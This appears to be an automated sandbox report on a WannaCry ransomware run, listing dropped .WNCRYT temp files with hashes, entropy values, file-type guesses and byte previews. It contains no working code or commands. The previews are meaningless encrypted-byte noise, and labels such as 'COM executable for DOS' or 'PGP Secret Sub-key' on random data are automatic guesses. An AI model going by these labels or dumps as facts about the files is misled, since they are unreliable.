                                                  Preview:..=....y.`;.~....-..e..F..C....vgi..6 1i..!...<..].....<......J....4Yv^.%Kh......C.b.-...}.&R2.@....)4>...d*AiVI...3$>l<.)h8..B....8p...*..........P..7x..\ ......g.. .v[\$..pC}v...Y.n..b.q...t.$........N..&!.R....2.q.L..jWG..R...b._..lu=.~...6.......)i....5...L...pP..*..../`...?y...I...^.9o).s.d..D..(.*..w{...u..v\Q..-......~Y....v....m.. ...._.v...[..o.g......m..!...........G>....v.....t.............>...*..@....1u..xj.UuE.:E.1W...U.^..-...Acqv6..W0K.....m...S{..C....8.z..a..i!m..:c..Lr../.3.Q..n.lnx.-...k.3]2...E.U;.l.C...p.k.#s...E*=.....#!.......8...&c.....r.>..i0..o.+=>G.>..2........".....~.f...#.........n.)?...~.....~@....=O....B.6.}.Y.._1.3FI9..Vq..3...1b.3....Z.. ...9.|.N..k....D..VQ.E.O.h..C.~k.....s.V........&.dX*$.M....8?.^#M...3..s...H9cE`Z0.F...=G./...f3`....q..NXjY....4..gn.T'?@5[...VP.;.b.U..N.2f..T..m(.Q...Tx.=J..]KaJK...X.U....c.....3...(..J....GG.?..m.l*..>.yIV.9.........wb....u..v...Y...A4lT.-6=.1..'.P_)...b.e..U.m...2|'

                                                  C:\Users\user\AppData\Local\Temp\38.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.802056296456517
                                                  Encrypted:false
                                                  SSDEEP:24:+kUaPHVl7d2dFm8L8uJLJ0C/QmoL1cB3JgfIdLEsJUgAw:7FPTd2Pm8L/F6qQjcrXLHf
                                                  MD5:E0CB323321AD80AA32657B7049955BF9
                                                  SHA1:237E81047F8114B831ACC7742602E48AD6B8EBB3
                                                  SHA-256:84020FF7F711136C61D7E8881F03819E6BDF6DF4C902B3F77003196AE8D6750F
                                                  SHA-512:18272A555A93BA03010974D17B0499D5422A464439BF30767BFB0366A46D3C32E7DC9AB243841D3A0D94F46E78D2A22B2A7D1E9BE84B92B194AB940292BCBEEE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.y....%U`8e..<^MYzO4.J.......E..".xF".....'i./......?..V.=_.L;X.q.-..TS..P..].Z7...u...0.$...D.j.....T...@.J[..#...:9.Z..c.\.......7-.....t.../S...~\...<..B.SY.u.mO...s.....w...},.m0..$?..E...[U....#...[....K.0..wP>.T...-4.]a....%,.E...[...>d...Zzk10..'Pg.:.....?.[....!.Sw.#.l.wwp..i.+&.........X_..E.}.J.e...L...Q.....r.K.5C....w.w......_)1n-..e...%.1.Sk-....I(5y...S..c...o.p..D..W....t...'.ql..9..u...Y.J2.g!....@.....r...].......%...q.R.......1M.a}p.id8..H\.s......(..R.....P..1.8.p_.N.X.?.....)O.:r.s.$...:.....W.o....#.wn..u....9.mt.s.T{..r!`.W....m..Iie.2#.yJ.........Z..F.J..3.V.f..AM......|{.z...L...W.0.x......~m.6i.08....YbD....Y.6...1j..;.7..jDt...1w.8ze....>E........v..4.h.Cm..C../..(6.Eb..Y.Yy.-...i}..b...P..>;....k.#{$._z.*.aW.^..I@..C...B.g..M.._9.zx..{mV...#..X.......XRK......[.6.0.......+..yLX*..`p+.n.vC<.....z.(..U..S).....-.......'0...Y.b=T:....1A...j...."...1......0.>....gG....w...F|f.s:.....6.]..G..Fb..q.1........MbL...

                                                  C:\Users\user\AppData\Local\Temp\39.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.7944110964953595
                                                  Encrypted:false
                                                  SSDEEP:24:7JQ+xHUrqJTbn32RNj3TP2ePjLk76hO+ev0zWluaREH6:y+x0rMr32RNj3TP2ek78jeszqC6
                                                  MD5:C7889EBC3C299AAEDC9D3C499DFAE58B
                                                  SHA1:91C7664408DD612E9D9AD9446B83B78672F7AABB
                                                  SHA-256:43C75FA9377EAE391949D6F2BD488F96F29EEB17DC4245484CD2C203A4DEBE6B
                                                  SHA-512:825A8AC88421C69CC127868F45289D1D53CD2DA6886199651E778BE2D8F1ED5CB80EF9F2B2E3AD4953A3A1504BBD4ACB228AC5C91F55F5E7DFC4742EADE98DF3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....z..#.\...j..X.7.R}[...-..T.w.......%.....J..-;.]6X..+b.N.H..........r...N.=>KgI......M.p....H."};.T(..9..Sx*.v|.....z.iI....a..dd....W.G...".M...o...V..Mh...go..g....).?..}..7....$.'.n..h...n.O..l....@Y.Rz...n.. .W&.Pa.......n.....W....@J..eI..R.3G.XI..*.Q./..R.Bn...TF.fT...?(}...j1D.j.{.j;...Ex.Ct"tI..z....-M.?...>K.[......001n...Jp.j...6Eq.f..0.&...$.z..}......Q..z....o.;B..^.u.R.(.L.:bF/.t.BCGXK=e(.-.-!..........R.G.5...K..V..i.x.I~...^...ep.k.$7..#..A.s^...t.Y....s..*......DK.t.-7...lE..Q.x.Jh>;g....D%'.8....5...........E.jm.(..5a.>..]N&..p...=.*'....#-.H9k...}.`...,.jt-G...;..,..._..R.B.&..Q+..o....w......p.Eq.".y..+"...jg.....8J...O,.....W........WR.e(....8.g.. .lC.0.....{...N.',.b....u.a...l{....M.A.0..3.J.......T..D.h.......8x.XM.Qt.;p....$.....x.?.......b&..N.g.&...HC:k.h.Y.Q.J~...k..,.C.e8.!N.e...f.s.u9...g.<N[> .GFR'Z...G(5..6v%$.....#...&...sv)..2....;p...,i9..`......MM.7..ej..5......('I........c......=.Y.

                                                  C:\Users\user\AppData\Local\Temp\4.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.827138986530992
                                                  Encrypted:false
                                                  SSDEEP:24:wtCE+sU3w+zUgHK71/MWELrWYqI18n7Xav+9Pv9SkNRuItwHv:sCE+sU38h/MW3YqI18jamZlSk/tYv
                                                  MD5:C91BF4314249D2EEDEDC77C69825BB54
                                                  SHA1:267E54AC46199A225AFE502ABD091E9110664C7C
                                                  SHA-256:BF72B3A5D071B1E075DF7181693D496A5660E4EFF0E3AF9AC34F60BFE6D79CB5
                                                  SHA-512:6A8A3E57DA22410EDD4C929AFD10ED76880010B5455FD620471C6330C3E577600F2C8303ED97748A446755DB84E522B159B4C0DD8AFF2C212018B4F7741D7DED
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.3.>Kr.P.......l.E..a.q.?7..K.Ux.+e}B.M.....c.w.W.}:......H..o.[)q......H}L..RWvz]....&x..b...I..'.....fH.$.E.?.Mp.3OG....<]h.L...cO.^.g.S....KI....].d...._"..bL..6.\........P<.I.W."u..lEE..P......%`|.......>...'-.....4............)...j.=.Nto...h.?..T.V.&.E..kdf..gO..g....*..._.....(.....6..-nr.*^...w.4..........K..>.L0S....0<44..F...{......sG..%3..~t.]1.6d.J..J.?.:.......7.s+.n..y..%.y..+. :....0.L....?.f...;.}...1...Xz..y...l...i.hA?..O..c.?y...a}.n.*.7...2.......F.w.....`().j..\..-iO..Xx.$...Q...Q.~{V.7&.S.f1.?f ...y+;.........5..|o.#V.D.}...y.x"A.N..7... ...p.7&..Y,.Qj........8....*..z..t...)9.6......M..;..bO.Tv.?.ku:....eOxj...A7...Z.'.G.a...%.;L...y...\...........@........T..u.d...6.z.....l.....J.1....IA...U..>0p......Nm..oM#.....y#..:{.3..p=v6..9.pk..y=u...}.t,G...r(.W..H../:...=@...}./..72.[a..>..:.a..E.fO......6.&.#{.@...vNQh.....-..E7........x.l..C.9C.G..y.!K?..D.sm..bCjo.n...3.sX..R~...W.^...oQX.%.}.kaH.Y..y1a...F.....!d.(U...\.

                                                  C:\Users\user\AppData\Local\Temp\40.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.823920902058649
                                                  Encrypted:false
                                                  SSDEEP:24:UWQ81IK4t8HhWioZuzNlHCLTpiP+zqi/qsL0cocJQO02Ba:UWhIDtaoYzNliLTYxaqEDJha
                                                  MD5:B8DFB1B4BC3E8B1C811AB24C19B587CA
                                                  SHA1:58B0ABCF7B827090B8D9B4B02A908C6925AEE619
                                                  SHA-256:A10E25A0F4497554CF3DCE7A94D4E9F961AE0F6BC37721EA456DBA98CFD96A2F
                                                  SHA-512:20A4D23E77B24B70F703DE429BCB06BD57F8D0E394800A46FF539CA93424A806D1EF60750767414EA465E2B79AD5C906FBDDD04182084C507AF3DFD5B88DA98A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...L5.M3..+..R..+......./.G...V.5.;qC.B....5.....U~.....'9.b:......>..b...+au$.FO3.;tyU..l.J...$.:.,M%.FH..hC.lI|N"y1..a.!.d*..@...a.....m...ZE...wShF.z...P.5W#|oH.........{A......`.8.c.F..].C.iq.bM...L...:..u@V..w/l....U....t1..igd.VZ....4.(....8...- .....>.o..........F..yV.F'...k.,g..H=C...a..O...`.I.0..>.w9. ...]1..@`....5..7.0.N.\..d.P.$7.h.o2o.{L$...N..B_......U...|.Yyn....x0;....x.H.*Se._K@....g.A.e..R.......B.1#.....x.. ......G!....V.kV.w.. .....x.)S.....h<&..x+vP......4..N.M.....].`B....r...^.V..J{.0./....>5L\[.|..E.......kt.c..m..K.YY.&.zp..n.7t..qx|!....QV..a.&2...e.^d.........j..8.j..'....`...\.c.q..\...l.r.b....b'-.c.....JX...e.)..........x.~...A*w.S.."t&!...I.v@i9*^......l.].z.,[.6.)t.....T.hAI..Z.m..y......62.....b..S...2..9..._l.k.9}....pt4.0.x...$j.....jT.-...<'..{I~J......y...q..`.R-.).s..+?..Gw...f.N..+..-"...:.....p..yd..6..2..u.)...Y\.1..h8...z....Pv.)..J.;90p..$..!.h.:...;g;./.|.;.yV........Za..I39Q.y.i.,

                                                  C:\Users\user\AppData\Local\Temp\41.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.809266884387007
                                                  Encrypted:false
                                                  SSDEEP:24:D254GyPGfFrnlPGcE7jFmqZHzuloF/NpnMcjxw:D2mjWtnu3gmPNNbxw
                                                  MD5:6111258FE7D58E1118BBCD7EF4A6BBD1
                                                  SHA1:9BE6732C0B7E9B9C5B872ECCC1EC43D371A213C7
                                                  SHA-256:128D29DD818B3A553569E2661510024ACB4463A3D46A769A730E3FB682759757
                                                  SHA-512:D0E2B04BDEF026D7501CD5E2B4EA501F6050794C892E7B511CC1799528308BF6D696907EFBB38FDEC7C7E09168F3C80CC66173BD58206117B3F79E1661DF03FE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:nN.......y.`..LG\...Y[....B...."..?..Y.*a_ .>.1...?.8..A.....Iukt..D.P.2.]..Q...e.ZIw%{...Zpy...L.........&..N...x.......zZ.....7a.=..&....3.??.3......62..*....~_..3Km@l.b...^.2..O.h.v-#.$..h.q...8...`.q.D..Uf..p.}y4.....o.....B....w,...,.a.D...C5N.,......;...ZP...=.....=......... .b..=X..(...K.\.........%.f.(...khU......F..T..F.c..h..c...H.'..s.'p.....Y..2...:d7y...S....K...j...kF..V....._.....~UFp....0..#t*.`.........(.!...'.f0w..M\S..b.;'..N1..j.......#.5.(....y...!UF....n..O.z..Q\.^N..Fu.?.4& ..&O.........r.......n.c....y..&#!..\.x.nQ.....Z+.....9..]]..L`.B...9a.....<d<.].!..,....ZO.3.'$*>.%.c..#.....l...a......e.5..1.rM....X,..2......Y..............V.......O.....'. "+m:..W.o.&....0\.~])|.t:X....`..q.....;#o...].......,.s.........~.../.D.[.H.4.ZY.......Lo........UH.$ .....G3W0..(&.~.....:.'^aZU.`.....0,.^..P.q...diK~....i,A...\...4<j.g.I.W.f..|>.....s..-.,.r.k.w_Y.s.af.. ........M..P.i,.J1..s...t..yNXE....12..^P.e..m..[..S.a.s

                                                  C:\Users\user\AppData\Local\Temp\42.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.817309017875281
                                                  Encrypted:false
                                                  SSDEEP:12:unTDxuxcVLjoc/zyMdas8sxKO8SqihCkaV2HMArn4Ghz0SBBJQrpsYFIb2QDSbwp:unTD+cVY8vFlZ+/mrfbJcps/rDSwCW8G
                                                  MD5:AAFF507717F37754B32D6375B30F457C
                                                  SHA1:FAAA50084BEBAA7F0E0A6C85A51A931752A0ED43
                                                  SHA-256:2C0B83179CB7CC7E6785A106AE6B7758085515A82FF8A058CBA16E94174D50EF
                                                  SHA-512:220AA91CC0E8C293081DC7A944991C66718861A81E07A0EE37BA82AE8DB2EF02F4B872805A47D3B90EBE3DC93B8828B4F54EB3103D653DACA76CBA21721F4947
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..^{.}.i.f.H.u>(....&.q.<........X..U.g._.#.........W..T....3.4.^F....v.x.F.2:..?...a.8.....".TM2.:....^...=.w.."...`>............n]=./.jv.........w...&..VG!....HY.....w..g.....i.V.EG.+.A...\.%.U...WIo......%....Z.L.L.%Z....z..V.3.t..x.Ub<.f..S..I`..8.7s.3. .a..'z;..,h.H..1<^....`1....>.=..)n..._.s.....}..w....?...a.$1.S...s...*......M......X.u...0`...e...*zI....;g.58q....<t.......t..y.A.=@...0.... .0.u...]..=..&K..'v..L"...7`O<*.+...@u...u..x..9..%w.[ ..h.f..U$p9...f.z0.|L]0.5\\.0U..Wc..U]G~./O..O...6.9.C.Y.Q+.S...0C..d...g......S.w......O.l.0>K.Y..)..I.)..)...N.@.!..|.h.FD..l..jL.i.m.jT(&.x./g.E...wnr-.......:..P.d..%;....+:.p.|..I*.B,C..%...n7..L.:l6<..U..%2.B.K.4.. H4....I.k...n.,... U].....9.....c.}/...e.......9....\*L.M6...f.....^?....5'.%....d"7..[.cCs7..)...".+..|.6m..{L...|F.n..p..RW.f.L..."/'t.9}'..9......F3...W..q.].XRED.H..K...|.)).YR..>A......h;.].-.2K4.: .3..r.c....Z......,....t.....vA~(%i/^S....f@..^.u...Y.99.f..F..{........w

                                                  C:\Users\user\AppData\Local\Temp\43.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:COM executable for DOS
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.809328826148128
                                                  Encrypted:false
                                                  SSDEEP:24:TTShNuVorf5jiZR7OP5AjhpYCx/Mss+cjlScLsmW0dZ2U/:TTS/v5c0P5x8/Mf+2FLsmn2U/
                                                  MD5:AC8D1D7E4D7E86AA41125D0573287FE7
                                                  SHA1:06DADB2A070A95FDB5B62233AED37484D5BA2276
                                                  SHA-256:35C072DC1DBEC4FD627D5DCF4676826E81D9A4C0761A8CBBC7A71CDAA09DD175
                                                  SHA-512:4C2A8C4E63518F5F3E6F35C6B7BA0DF2182027B2019E617367C72FF6787EE5580B6558D492143E65B3740286994D4E6BB2FB6D34F979A52B2D83A893A4898869
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:.8....b.Z.t. ..Dd.._..y.|..dw4...W.Dq....!.d.G@..^..,..c...[..rROH{........O.L.u..].2..F.Y?....0.O.....p.#"&y"..E......x..._E.[.uz.B.,.......O.b.@1.H....J..Q........:<z..n...<._0.b{.-..n....1f*.{:.]?H(..<fU..X1.B.bZ..[?.....:.g.H.....e.vl]..X.......hY..>V...n....0M.I.D.8.....;M..).m.D.4.P.v.BAHY..P#.}.Zif.d........=..@...Z.....4>a........)..K...T.at.9J.b^.4..;..d..=m.oHuU...[..0...dTa.GDhr<...*(....q....4.>bW.FcqI......P.......#...Y.a.Z........o..Q...'........q>....f.Y...+..I.$X......K...j,....lF.h.L;..:.S...:......._..T.P.y.YI.......MM.f..`.N.$I,.......u..=..7.......#..9..)..n.M..%....3>g......f.74d.o......a9....}...!A.....F3.c.Mf.?;A.... ...x..4...#3...s....V..S..',.F.....Z.G..#.+Ev!.d2.4.-...=.yw..9\....nq..;.....GiV....M....-k.Q........f{<..(R..`n..u)....b|...yb...u.m%...sN.E..../;9q.av...}z....6S.JfL..y.1R....{......B...^p-k.%^.{q.lR\(Yh.l;.?o6...6..S.tF..!.3w..>...k..'0f M..A.)....w*.tL.7...1.....k...&...!k...;.U.m.UR..B<M..

                                                  C:\Users\user\AppData\Local\Temp\44.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.807389885361978
                                                  Encrypted:false
                                                  SSDEEP:24:W2Dt+GAhZyIYfga/zOfaVNGttv9+xRFK+ayt8gAWR9kBS:W2Z/kDarZGttF+xCIt8gOS
                                                  MD5:C151D01D5B70797EEAF7ADB2D34451B2
                                                  SHA1:635ADC1E62F7F9E4FAE2045EFF81D4B40BB46351
                                                  SHA-256:BB5DBC787DC79E82ECA6962157CDC97779CB0B804226FB270056253877327C4E
                                                  SHA-512:0C2F5A4B0CBA4B5445BB24A1B8F9900E1B505513DAB20E3B488CFEFF7887FDF6C40706D3EA8E4E9E4D1CA62A5CB76D6DDEA0F6B244F90252FD93522D98933016
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..._...~Lt....N.k.}.$.H...?+..2..e..?V^......n....4L.........3.:.....E}...$?.0..j.N....&.....p...eE.0.[....?`b....pj.g.>.#...@<.....Jx.rvE..E..$."......C ....[......Z..ej..Vf........(......QR.......48.[.Y.&...\..~.B.m.W.._.$.3j.lT.O..%.T.(l....V....C.....h.Bl.Bf.......(.=.I.R...f)wC...F.)fC.l<....\.}..84..;./>7..5..).Q..w....d..:m...B..?...}....}..55.c.s.T....N.=.7zSnV..]...j...G}...B.`.0.^...*....{t...o.k.V^h...4.o....w..!....vd[.%:0\..i.9/S.n.N]..JvN......@/.8>_cbo..Q...WAR.....J.._...K'....y..g..]xZ..Z...QF..X_..K....c..;...H.'....i./.RU..BD.~#.....q...;xO..hyW.db.:.2..9......)<.C{.K..I....zpR.....p...V_....}.w.."v.tl.Z.HR,...}...2.[.Z4....!.Lf3l.%.(...........c_..........g....5?.+..'.O..2d.&l...Y..f..B..[f`(`.?.....7.S..b........y.>..'..go..;./. .:...g.M.=U.H..#s.]....+..$.p}Q....M9.....v..CD.W..).M.h.....Ld...1..jKV>~M.N.za.%.|.G....#Tk..a.%.Jn.{.|_B...Q.(A#..r..W.Z...R...k.{..i...)l.}Ai......%@.:.|...9..:.'...s.......K.V..7.u|._.50..p..

                                                  C:\Users\user\AppData\Local\Temp\45.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.808219026271454
                                                  Encrypted:false
                                                  SSDEEP:24:Lcq8odOoQ/3OWtxHZcdOzykjTG4hXT0O5vlz3hOdHd19Jj/b:LcCOH/3OyHZeOzyEK4hXT0Obz3hOdHdp
                                                  MD5:4BF44035F161D1D2F36025E33433A828
                                                  SHA1:98074E2581F90920533ACBD7C4F642E99D169D21
                                                  SHA-256:C682816FD03CFE710DA1359784CFD44ED43B91B60BDA3F42E0EF4709BA68B465
                                                  SHA-512:4AB005DA66377FDBC7118B8A4D6EF36D733F9FF141AC17E22B483CF1580B35E6474432334ECB4CC1DFE33518B0A99B0A0FC5EF397D1F0823A0BD0D4C4E79DEB8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:/...e.X...`K........o..ZY.....1...}.q..V&;.0OI+b.O.k&.=...F#.<.....h...b../..]c..\.E...~&.....:..3......ob..B.:...-...'.....F.."(L;.........@...H..YC......,....YU.Y.."..r:.QR...M......:.......>..V!0.(...`$B..F. P..R.,8.G.....D...8.@........./..../.0......*.u-..[...`.s. ..3.+\.........MJ..........~.i......p.?...\V......'...)(.7....Hm...(a.?;s3.5.t.".V.jAZ.2....MT..8<<..AR...*....t.g.+=....p...$..j..^n.?P.S'=_A.....d..;..#.Y..\.:.p....|...p7...^.}..mk..n5R.b..._nhC...<B....O.......[.....?xED...0...-...KT.cD&.}...e.A..@.IRb.^;.<.b.9t.?d.5..W.. .....~..d2Ds....]..5\Q.`s...].$....Kx%...p.i^$.API5...,.vMa..5p&..Z....-.A....A..{.A.....|.:.!7..4.....Mz......)..r.....<zSi..4l..K...U.%.K.........\..;.3...X......M2.+..+.?..._oM..7.......$....x.}.x..........2&N.....fC....%7. ..(./9]......n........'....*.1.@].....DnA.....#..D."..R^d..~.+f......n..V..&.n.............LB.."...%..*... `...pQ....[G..G.....N..`e.)...o........;'s..7.,iot..R

                                                  C:\Users\user\AppData\Local\Temp\46.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PGP Secret Sub-key -
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.831915502669585
                                                  Encrypted:false
                                                  SSDEEP:24:JZs6DzBupkw2RIZXULGoXdxdbqLxEzeSrShmM+ClKd9tcs:ck+klaJoX7Bw+eSrjkkAs
                                                  MD5:54D49E9DA9BFF2DEBF5CC198FFCA9FBE
                                                  SHA1:4482183E0F6F98B0F29AC752938013018071A328
                                                  SHA-256:E85815B411E69AB303424D7E21F95F7E141D39150D9B85A7408BDD0C430F86AD
                                                  SHA-512:8358EA84D38CA71E7DC8CB38E6458CB9ED0C2DDE142C602F15DB118A1FF80EDE1F85569476F60283AEEAFD3E01A7C5DD0B4A001E7B1B65F49A4D191A5DE8ED73
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..P.`*o.HA4^.jF.O........%.x@#...F .0.+H..]V^...Z..}.c.u2....":.e...P..Y.....n...W..sy.i.c*......V.....O...~.^}C..^.w.........9.....a.0.A..G...U..l....|L..MQ0.<...S.VA........|u...3.>..ld...[....6.qBE.J.....[...}.n."..[..r....i+<...au..q.bA..\DKO..8..#mrJ....x..J[Rd..)[.......d..i..F5.V.u...'EF5U............U...(.W../N.;.....Kqx8...s6..Z..:...}.....PfNb..e)C..`.fKz..%....b..M....%M..j. ebT..mC(....4..7......y...{....,Z..o8..l.Xv.e..l|.p';.....4.:..8P%.z..Mu.+.[.a.Dr.%g.... p.*..D.......{.7"5v#..;'o..P....WZ.+....5...6...@.\Ry,.....F....P.....sR.+c}.i8..U>.v3U..-....i....=..u....{S.7./I..K.)Z.......'....#....I...@...p..#.~X<..9..@..w..D..P#..a.O....m\...to....Y.E.wrJ.dPIU\c<..oB.}!.pH....C...$......g..s.4%.6...[:....k..ro..L.{L..KR.....&F.lq...i.V..F...Z+...WM.P..@.0..(I...?.....-..q<....y6].]..M...".'.....~..!.......l ...2qN..E....?.>.....>..1f_^bm.Z8..G.kQ..Z.2..{D..O.u.;.V6._.....#j...i.=P+2...Bp..f.$x|T.VY/.P....L.G.....MY...T....m....4

                                                  C:\Users\user\AppData\Local\Temp\47.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.7926358695836955
                                                  Encrypted:false
                                                  SSDEEP:24:N7vTmupoOQiqmXeTnumMAm7Ey4/EBB5zYsvfx:N7vCuGOQUOTnuvDE7aLd3x
                                                  MD5:05BBDC74048BAF5700EAC9F0F502B2E2
                                                  SHA1:8D9F939696CE848D964B7262654EFE8A4354AF1D
                                                  SHA-256:F4A3B1744C479D99238E2FF65C738BF2A21C08F3F60EF232584769023AD566EF
                                                  SHA-512:BA8C791B57D1E1145D6264B1C05E9302341D143C8BA5A65D198CA4D9FB3C0517869F9268A31CC67A21B3C40740CB3BA26AA1987F3224F34C25A00E87AB4C53AD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.%..)..V..fa..%W..e#.(.e#...&.cP+Y_..:7$.Q..v.jP.....f....s.I.}...../_..j.!.Mg;U.y^m..5U..$5..m.5.}...u...6<....;.-....~..;'.OW.,.ZH]..w........j../.m..9W.bEi..:-.l.?.Z. .c......&j.<.C].L.A.Q..........Egj../...%.$.%..K.ZQ.......X. .!.Q.....?....86..ZH*Q.h...;.-V.L.5...M...j...:....@.........;L...)\r...q{-..z..t...P.R<.%.a:....;.....F.....=.g..@..~z4q.e/..F.L......sFbF'..C...SP&...k.V...N.g.u..$..M..B.0.C..=k..0.IRA..N.!v...\!..Y...TAsZ.E.{>............/h..TJ.....B@...;"L!...+U.....cZ y..^(:....\....R....B.......i.._.l^2@.b=7......}....!..g$...%j......h:.b......E.%QXE.S...08...W.....EP.o..\Mn..y.Ye^..o8.7.^r......N.....?. .s.`.@.g/.i..i^.iY.a...0~...?...E.').S......A.s..a..}..Uo.oP....0....F..1.......:)...m/.=.3y*.........3]......>.:....?)[7.5..U.....CU.l.].~.O3gHKb....Vg....s.%...R..?.|..u...B.u....t-Ey..o{..c.M/..P[..T..APR>....6.D..#./"wL...+O..H.....u.."......# ....{@.N..Z..2...>;.:..E.}..R..Ro.u$.@.?...Q.B'..4il...{..c.E".,

                                                  C:\Users\user\AppData\Local\Temp\48.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.814963475003599
                                                  Encrypted:false
                                                  SSDEEP:24:VAwE2o5O3DTvy0NBdNtbyFTvd6r48d3fcq4/id0xywp:m5OTTv9HtbyFo48Bf3d0gwp
                                                  MD5:FAD97FEE497B18A3CB162EE30412AEF9
                                                  SHA1:10061238E99FF77599BB41DCF5AB1E84A961FD17
                                                  SHA-256:02FA6DFAA627BEB9A7742FDDCD78785168E83C5A063615F2EA6422ACA4B2C7CB
                                                  SHA-512:62CFD2E7F33A674957C372A410590A7049272091BFEF7A0A5D69A409CE29816D0BF6D670F362C4B1B0708EECE9B0BD2B5A55D944A0A8C91A3E5C309C7C39D26B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:i..{...B%...T_$.k...t4.......x.D..U..k.....O.N.P.....K.,.....j.....d*.)...@QoaV...wi..S't.3l.../.f... ..K.c..".E.m..M..T=.]/&...o....8.sv/ii...y>k........o.aX......l[=.E...3.`0..v..f.}s.........f...........&..peG...@~..i....^.p0.....=.@..,?...|._.........C.}!.Y......>..y,...^...A"h.O"u.z.......=........D..1..*.r../.=|.Y.tD...Is.>..u....I.....X.c.........mL..o..73.....1...)$..Sq0%..A..&x..l.._O.....d.B :....'.N.pXQ.Z.uo.(.,1...<}.W.....[.%........>.V......t.gdQ.K.f....4Y.....8.....x....EY......\<Dh.F.s..EJ...B..R..Z.....Z.:0.2...}.I.,'|Q4.~9...QN..X..96`.,hs.....Ja.@..a.v....eAp4.>...c.gd(.Q...jL.+.(xr.."....Z..Q....q..3=L.)}oP....9...%...x....;.... ....2.}.n...x.?j........w`..a..!........'...y|g.s[3*.9K....a.o$.s...fO.)Rt.JaH`.....X...Ui..A..7.~a.6X.p-=.....=f....ZC.N.XF8.#7.a.ap:?...uQ.....R.*..c.;vY....W.....7C./L..<?Y....h...e.....4.X...[.X7.......:a_..9...).@...6.....0.. .U.5b..,/c.../=...aJ....g............!..l.R.....H.

                                                  C:\Users\user\AppData\Local\Temp\49.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.799115671762158
                                                  Encrypted:false
                                                  SSDEEP:24:8Lb888eS3BlYjHAjitpi+aBxGmsdY0uhMdf529:8LA8Mot7mPRXzqf56
                                                  MD5:24713DB2386E3442F858334B82AEF8E1
                                                  SHA1:1ACEF0FBC96CEB70D2E8C0128AEC4F22B41DB9B9
                                                  SHA-256:A1C82418F3CF9DD0FBC657645E28BF5F35B060DAEE7A0BFAEABCAB41DD61F211
                                                  SHA-512:C2AFE9C5417FBD01329E0F73CD8A485BFA384AE7F5EBF28C194413099B5F647259B991622D41B4C8D2E6BDE8BF17DB7EDFBD8DB916ADE357D5F6007F3FCCD169
                                                  Malicious:false
                                                  Reputation:unknown
